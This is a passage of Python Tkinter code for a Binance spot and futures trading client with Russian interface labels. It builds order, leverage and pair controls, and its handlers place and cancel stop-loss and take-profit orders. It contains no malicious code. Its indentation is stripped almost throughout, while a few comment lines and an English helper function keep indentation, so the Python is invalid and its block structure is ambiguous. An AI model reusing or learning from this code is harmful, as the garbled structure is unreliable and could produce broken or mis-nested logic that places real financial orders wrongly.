        # fifth label - Buttons for my orders must be here
self.label_Cmd = Label(root, text="", bg="lightgray", justify=LEFT)
self.label_Cmd.place(height=500,width=100,x=510,y=150)
#__seventh label - symbol of pair here
self.label_P = Label(root, text="BNB/USDT", bg="lightgray", anchor=NW, justify=LEFT)
self.label_P.place(height=30,width=100,x=510,y=150)
self.CB_MrgT = Combobox(root,state="readonly")
self.CB_MrgT['values'] = ('NONE','ISOLATED', 'CROSSED')
self.CB_MrgT.current(0)
self.CB_MrgT.place(height=30,width=100,x=510,y=200)
self.CB_MrgT.bind('<<ComboboxSelected>>',self.CB_MrgT_changed)
self.CB_Lvrg = Combobox(root,state="readonly")
self.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
self.CB_Lvrg.current(0)
self.CB_Lvrg.place(height=30,width=40,x=620,y=200)
self.CB_Lvrg.bind('<<ComboboxSelected>>',self.CB_Lvrg_changed)
self.button_MrLvSet = Button(root, text="Сохр.", command=self.click_button_MrLvSet)
self.button_MrLvSet.place(height=30,width=50,x=660,y=200)
#__PAIR SELECT
self.CB_P = Combobox(root)
self.CB_P['values'] = ('BNBUSDT', 'BTCUSDT', 'ETHUSDT', 'WAVESUSDT', 'EOSUSDT')
self.CB_P.current(0)
self.CB_P.place(height=30,width=200,x=510,y=250)
self.CB_P.bind('<<ComboboxSelected>>',self.CB_P_changed)
MPSLvar=StringVar()
MPSL_list = ['SPOT', 'FUTURES', 'MARGIN']
MPSLvar.set(MPSL_list[0])
self.MPSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.market_selected)
self.MPSL.place(height=30,width=100,x=510,y=190)
SPSLvar=StringVar()
SPSL_list = ['Все', 'USDT']
SPSLvar.set(SPSL_list[1])
self.SPSL = OptionMenu(root,SPSLvar,*SPSL_list,command=self.pair_selected)
self.SPSL.place(height=30,width=100,x=610,y=190)
#__PAIR INFO LABEL TEMP
self.label_PI = Label(self.label_Cmd, text="Пара", anchor=NW, justify=LEFT)
self.label_PI.place(height=120,width=200,x=0,y=120)
self.Tree_PI=ttk.Treeview(self.label_Cmd,selectmode='none')
self.Tree_PI['columns']=('param','val')
self.Tree_PI.column("#0",width=0,stretch=NO)
self.Tree_PI.column("param",anchor=W,width=80)
self.Tree_PI.column("val",anchor=W,width=80)
self.Tree_PI.heading("#0",text="",anchor=CENTER)
self.Tree_PI.heading("param",text="Параметр",anchor=CENTER)
self.Tree_PI.heading("val",text="Значене",anchor=CENTER)
self.Tree_PI.place(height=120,width=185,x=0,y=120)
self.Tree_PI_VScrl = Scrollbar(self.label_Cmd,command=self.Tree_PI.yview)
self.Tree_PI_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_PI.config(yscrollcommand=self.Tree_PI_VScrl.set)
self.Tree_PI.insert(parent='',index='end',iid=1,text='',values='символ')
self.Tree_PI.insert(parent='',index='end',iid=2,text='',values='статус')
self.Tree_PI.insert(parent='',index='end',iid=3,text='',values='базовая')
self.Tree_PI.insert(parent='',index='end',iid=4,text='',values='котируемая')
self.Tree_PI.insert(parent='',index='end',iid=5,text='',values='маржа')
self.Tree_PI.insert(parent='',index='end',iid=6,text='',values='тип')
self.Tree_PI.insert(parent='',index='end',iid=7,text='',values='минЦена')
self.Tree_PI.insert(parent='',index='end',iid=8,text='',values='максЦена')
self.Tree_PI.insert(parent='',index='end',iid=9,text='',values='шагЦены')
self.Tree_PI.insert(parent='',index='end',iid=10,text='',values='максОбъем')
self.Tree_PI.insert(parent='',index='end',iid=11,text='',values='шагОрдера')
#_____________Orders START
        #__Label - background panel for the new-position (order) controls
self.label_CmdOrd = Label(self.label_Cmd, text="Новая позиция", bg="white", anchor=NW, justify=LEFT)
self.label_CmdOrd.place(height=300,width=200,x=0,y=350)
        #__Label - Quantity (Amount)
self.label_QOrd = Label(self.label_CmdOrd, text="Кол-во", anchor=NW, justify=LEFT)
self.label_QOrd.place(height=25,width=50,x=0,y=30)
        #__TextBox - Quantity (Amount)
self.text_QOrd = Text(self.label_CmdOrd)
self.text_QOrd.place(height=25,width=80,x=50,y=30)
self.text_QOrd.insert('end','5')
        #__Label - quantity units and leverage hint (USDT x leverage)
self.label_OrdAss = Label(self.label_CmdOrd, text="USDT x 20", bg="white", anchor=NW, justify=LEFT)
self.label_OrdAss.place(height=25,width=70,x=130,y=30)
        #__Label - Price
self.label_POrd = Label(self.label_CmdOrd, text="Цена", anchor=NW, justify=LEFT)
self.label_POrd.place(height=25,width=50,x=0,y=60)
        #__TextBox - Price
self.text_POrd = Text(self.label_CmdOrd)
self.text_POrd.place(height=25,width=80,x=50,y=60)
self.text_POrd.insert('end','10')
        #__Label - price units (USDT)
self.label_PAss = Label(self.label_CmdOrd, text="USDT", bg="white", anchor=NW, justify=LEFT)
self.label_PAss.place(height=25,width=70,x=130,y=60)
#__new order LONG button - create order
self.button_NwOL = Button(self.label_CmdOrd, text="Новый Long", command=click_buttonNwOL)
self.button_NwOL.place(height=30,width=95,x=0,y=100)
        #__new order SHORT button - create order
self.button_NwOSh = Button(self.label_CmdOrd, text="Новый Short", command=click_buttonNwOS)
self.button_NwOSh.place(height=30,width=95,x=100,y=100)
#__temp new order show
self.button_NwOSw = Button(self.label_CmdOrd, text="Просмотр", command=click_buttonNwOShow)
self.button_NwOSw.place(height=30,width=95,x=0,y=150)
#__close opened orders
self.button_NwODel = Button(self.label_CmdOrd, text="Удалить",fg='red', command=click_buttonNwODel)
self.button_NwODel.place(height=30,width=95,x=100,y=150)
self.Tree_Ord=ttk.Treeview(self.label_CmdOrd,selectmode='browse')
self.Tree_Ord['columns']=('Pos','Side','Price','Qty','Type')
self.Tree_Ord.column("#0",width=0,stretch=NO)
self.Tree_Ord.column("Pos",anchor=W,width=20)
self.Tree_Ord.column("Side",anchor=W,width=20)
self.Tree_Ord.column("Price",anchor=W,width=20)
self.Tree_Ord.column("Qty",anchor=W,width=20)
self.Tree_Ord.column("Type",anchor=W,width=20)
self.Tree_Ord.heading("#0",text="",anchor=CENTER)
self.Tree_Ord.heading("Pos",text="Поз.",anchor=CENTER)
self.Tree_Ord.heading("Side",text="Напр.",anchor=CENTER)
self.Tree_Ord.heading("Price",text="Цена",anchor=CENTER)
self.Tree_Ord.heading("Qty",text="Кол-во",anchor=CENTER)
self.Tree_Ord.heading("Type",text="Тип",anchor=CENTER)
self.Tree_Ord.place(height=220,width=180,x=0,y=190)
self.Tree_Ord_VScrl = Scrollbar(self.label_CmdOrd,command=self.Tree_Ord.yview)
self.Tree_Ord_VScrl.place(height=220,width=10,x=180,y=190)
self.Tree_Ord.config(yscrollcommand=self.Tree_Ord_VScrl.set)
#_____________Orders END
#_______________RIGHT SIDE END
#_______________BOTTOM SIDE START
# Text box - System messages must be here
self.text_Sys = Text(root, wrap=WORD)
self.text_Sys.place(height=150,width=600,x=10,y=660)
self.text_Sys.insert('end','')
self.text_Sys_Scrl = Scrollbar(root,command=self.text_Sys.yview)
self.text_Sys_Scrl.place(height=150,width=10,x=600,y=660)
self.text_Sys.config(yscrollcommand=self.text_Sys_Scrl.set)
#_______________BOTTOM SIDE END
#_______________MIDDLE-EXTRA SIDE START
self.Scale_TP = Scale(root, from_=350,to=-100,resolution=0.1,bg='lightgreen',sliderlength = 15,command=self.Scale_TP_change)
self.Scale_TP.place(height=100,width=10,x=510,y=150)
self.Scale_SL = Scale(root,from_=350,to=-100,resolution=0.1,bg='lightpink',sliderlength = 15,command=self.Scale_SL_change)
self.Scale_SL.place(height=100,width=10,x=510,y=250)
self.button_PSL = Button(root, text="Сохр.",fg='red', command=self.click_button_PSL)
self.button_PSLR = Button(root, text="X",fg='red', command=self.click_button_PSLR)
self.button_PTP = Button(root, text="Сохр.",fg='green', command=self.click_button_PTP)
self.button_PTPR = Button(root, text="X",fg='green', command=self.click_button_PTPR)
PSDvar = StringVar()
PSDvar.set('LONG')
self.PSDvar_L = Radiobutton(text="L", command=lambda i='LONG': self.PSDvar_Ch(i), variable=PSDvar, value='LONG',indicatoron=0)
self.PSDvar_S = Radiobutton(text="S", command=lambda i='SHORT': self.PSDvar_Ch(i), variable=PSDvar, value='SHORT',indicatoron=0)
self.PSDvar_L.place(height=30,width=30,x=510,y=190)
self.PSDvar_S.place(height=30,width=30,x=510,y=190)
#_______________MIDDLE-EXTRA SIDE END
#_______________MIDDLE SIDE START
MPSLvar=StringVar()
MPSL_list = ['TICK', 'CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d', 'CANDLE SUMM']
MPSLvar.set(MPSL_list[2])
self.GRSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.graph_selected)
self.GRSL.place(height=30,width=150,x=210,y=120)
#__TICK/CANDLE/... start/stop button - start/stop timer
self.button_1 = Button(root, text="Включить", command=click_button1)
self.button_1.place(height=30,width=200,x=470,y=120)
CYPvar=StringVar()
CYP_list = ['-50%', '-40%', '-30%', '-20%', '-10%', '0%', '+10%', '+20%', '+30%', '+40%', '+50%']
CYPvar.set(CYP_list[5])
self.Option_CYP = OptionMenu(root,CYPvar,*CYP_list,command=self.OptionCYP_selected)
self.Option_CYP.place(height=30,width=100,x=370,y=120)
#__Third Market graph - Summ Candles Market trades
self.graph_Sm=Canvas(root, borderwidth=2)
self.graph_Sm.place(height=500,width=510,x=10,y=150)
self.graph_Sm.configure(scrollregion=(-500,-500,1000,1000))
#__First Market graph - TICK Market trades
self.graph_1=Canvas(root, borderwidth=2)
self.graph_1.place(height=500,width=510,x=10,y=150)
self.graph_1.configure(scrollregion=(-500,-500,1000,1000))
#__Second Market graph - Candles Market trades
self.graph_Cn=Canvas(root, borderwidth=2)
self.graph_Cn.place(height=500,width=510,x=10,y=150)
self.graph_Cn.configure(scrollregion=(-500,-500,1000,1000))
#__TEST PAINTING START
y_axe=[]
yy=(10,10)
y_axe.append(yy)
yy=(10,180)
y_axe.append(yy)
self.graph_1.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(10,180)
x_axe.append(xx)
xx=(230,180)
x_axe.append(xx)
self.graph_1.create_line(x_axe,fill="black",smooth=1)
y_axe=[]
yy=(10,250)
y_axe.append(yy)
yy=(250,250)
y_axe.append(yy)
self.graph_Cn.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(250,250)
x_axe.append(xx)
xx=(250,100)
x_axe.append(xx)
self.graph_Cn.create_line(x_axe,fill="black",smooth=1)
#__TEST PAINTING END
#__Second Order graph - Zoom orders
self.graph_Zm=Canvas(root, borderwidth=2)
#self.graph_Zm.place(height=200,width=100,x=410,y=150)
self.graph_Zm.configure(scrollregion=(0,-500,100,1000))
#__First Orders graph - Market orders
self.graph_2=Canvas(root, borderwidth=2)
self.graph_2.place(height=200,width=100,x=410,y=150)
self.graph_2.configure(scrollregion=(0,-500,100,1000))
#__First scale graph - Top timer
self.graph_Tb=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Tb.place(height=30,width=510,x=10,y=150)
self.graph_Tb.configure(scrollregion=(-500,0,1000,70))
#__Second scale graph - Bottom timer
self.graph_Td=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Td.place(height=30,width=510,x=10,y=500)
self.graph_Td.configure(scrollregion=(-500,0,1000,70))
#__Vert Volume scale graph - Volumes
self.graph_VV = Canvas(root, borderwidth=2,bg="white")
self.graph_VV.place(height=100,width=510,x=10,y=450)
self.graph_VV.configure(scrollregion=(-500,0,1000,100))
#__BTC/USDT delta
self.graph_BTCD = Canvas(root, borderwidth=2,bg="white")
self.graph_BTCD.place(height=100,width=510,x=10,y=180)
self.graph_BTCD.configure(scrollregion=(-500,0,1000,100))
#__Zoom button
self.button_Ord = Button(root, text="Вкл. Zoom", command=click_button_Zm)
self.button_Ord.place(height=30,width=100,x=410,y=150)
#__Start/stop button
self.button_OrdTmr = Button(root, text="Вкл. ордера", command=click_button_OrdTmr)
self.button_OrdTmr.place(height=30,width=100,x=510,y=150)
#__Graphs BINDS
self.graph_1.bind("<ButtonPress-1>", self.button1_press)
self.graph_1.bind("<ButtonRelease-1>",self.button1_release)
self.graph_Cn.bind("<ButtonPress-1>", self.button10_press)
self.graph_Cn.bind("<ButtonRelease-1>",self.button10_release)
self.graph_Sm.bind("<ButtonPress-1>", self.buttonSm_press)
self.graph_Sm.bind("<ButtonRelease-1>",self.buttonSm_release)
self.graph_Zm.bind("<ButtonRelease-1>",self.buttonZm_release)
self.Scale_TP.bind("<MouseWheel>",self.Scale_TP_MW)
self.Scale_SL.bind("<MouseWheel>",self.Scale_SL_MW)
self.Tree_Pos.bind("<Button-1>",self.Tree_Pos_click)
#_______________MIDDLE SIDE END
def Sys_Msg(self,text1):
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + text1
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
def OrdSz_Ch(self,i):
global OrdSz
OrdSz.set(i)
app.text_QOrd.delete(1.0,END)
if i > 1:
k1 = "%.1f" % (float(float(i)/float(Lvrg)))
app.text_QOrd.insert(1.0, k1)
else:
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
wa = float(BnFAcc1['withdrawAvailable'])
wa = wa*i
app.text_QOrd.insert(1.0, "%.2f" % (wa))
#print(OrdSz.get())
def PSDvar_Ch(self,i):
global PosSide
global PSDvar
PSDvar.set(i)
PosSide = i
if PosSide =='LONG':
app.Scale_TP.config(bg='lightgreen')
app.Scale_SL.config(bg='lightpink')
app.button_PSL.config (fg='red')
app.button_PSLR.config(fg='red')
app.button_PTP.config(fg='green')
app.button_PTPR.config(fg='green')
elif PosSide =='SHORT':
app.Scale_TP.config(bg='lightpink')
app.Scale_SL.config(bg='lightgreen')
app.button_PSL.config (fg='green')
app.button_PSLR.config(fg='green')
app.button_PTP.config(fg='red')
app.button_PTPR.config(fg='red')
#print(PosSide)
    #__Left mouse click event on the Tree_Pos widget
def Tree_Pos_click(self,event):
#print(should_run_T,should_run_C,should_run_S)
if should_run_T == False and should_run_C == False and should_run_S == False:
Tr_item_0 = app.Tree_Pos.identify('item',event.x,event.y)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
if int(TP_CC) > 0:
#print(len(Tr_item_0))
if len(Tr_item_0) > 0:
if int(Tr_item_0[0]) <= int(TP_CC) and int(Tr_item_0[0]) > 0:
#print(Tr_item_0[0])
#print(app.Tree_Pos.item(Tr_item_0[0])['values'])
Tr_item_1 = app.Tree_Pos.item(Tr_item_0[0])['values']
Tr_item_2 = str(Tr_item_1[1])
#print('.',Tr_item_2,'.')
if MS == 'SPOT':
for ij in range(len(mylist10)):
if mylist10[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
if MS == 'FUTURES':
for ij in range(len(mylist20)):
if mylist20[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
                #app.CB_P.set(Tr_item_2) - does not work
def click_button_PSL(self):
global PEP,PSP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позиция LONG Ордер Stop-Loss размещён [' + grSmb + '], Цена: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позиция SHORT Ордер Take-Profit размещён [' + grSmb + '], Цена: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PSLR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTP(self):
global PPP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
            sys_msg = ' Позиция LONG Ордер Take-Profit размещён [' + grSmb + '], Цена: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позиция SHORT Ордер Stop-Loss размещён [' + grSmb + '], Цена: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTPR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
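    #__Illustrative sketch (hypothetical method, not bound to any button): format a stop price
    #__to the symbol's price step prSt, reproducing the precision cascade used in
    #__click_button_PSL and click_button_PTP above. prSt is the module-level price step.
    def fmt_price_by_step(self, price):
        #__step >= 0.01 -> 2 decimals, 0.001 -> 3, ... , anything below 1e-7 -> 8 decimals
        if prSt >= 0.01:
            return "%.2f" % price
        decimals = 2
        threshold = 0.01
        while decimals < 8 and prSt < threshold:
            threshold /= 10.0
            decimals += 1
        return "%.*f" % (decimals, price)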
    #__Mouse wheel scroll event on the Scale_TP widget
def Scale_TP_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-450,from_=-100)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-800,from_=-450)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=-100,from_=350)
app.Scale_TP.set(app.Scale_TP.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=700,from_=1050)
elif app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-100,from_=350)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-450,from_=-100)
app.Scale_TP.set(app.Scale_TP.get()+0.1)
    #__Mouse wheel scroll event on the Scale_SL widget
def Scale_SL_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-450,from_=-100)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-800,from_=-450)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=-100,from_=350)
app.Scale_SL.set(app.Scale_SL.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=700,from_=1050)
elif app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-100,from_=350)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-450,from_=-100)
app.Scale_SL.set(app.Scale_SL.get()+0.1)
    #__Value change event of the Scale_TP widget
def Scale_TP_change(self,value):
global PPP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt,900,yyC)
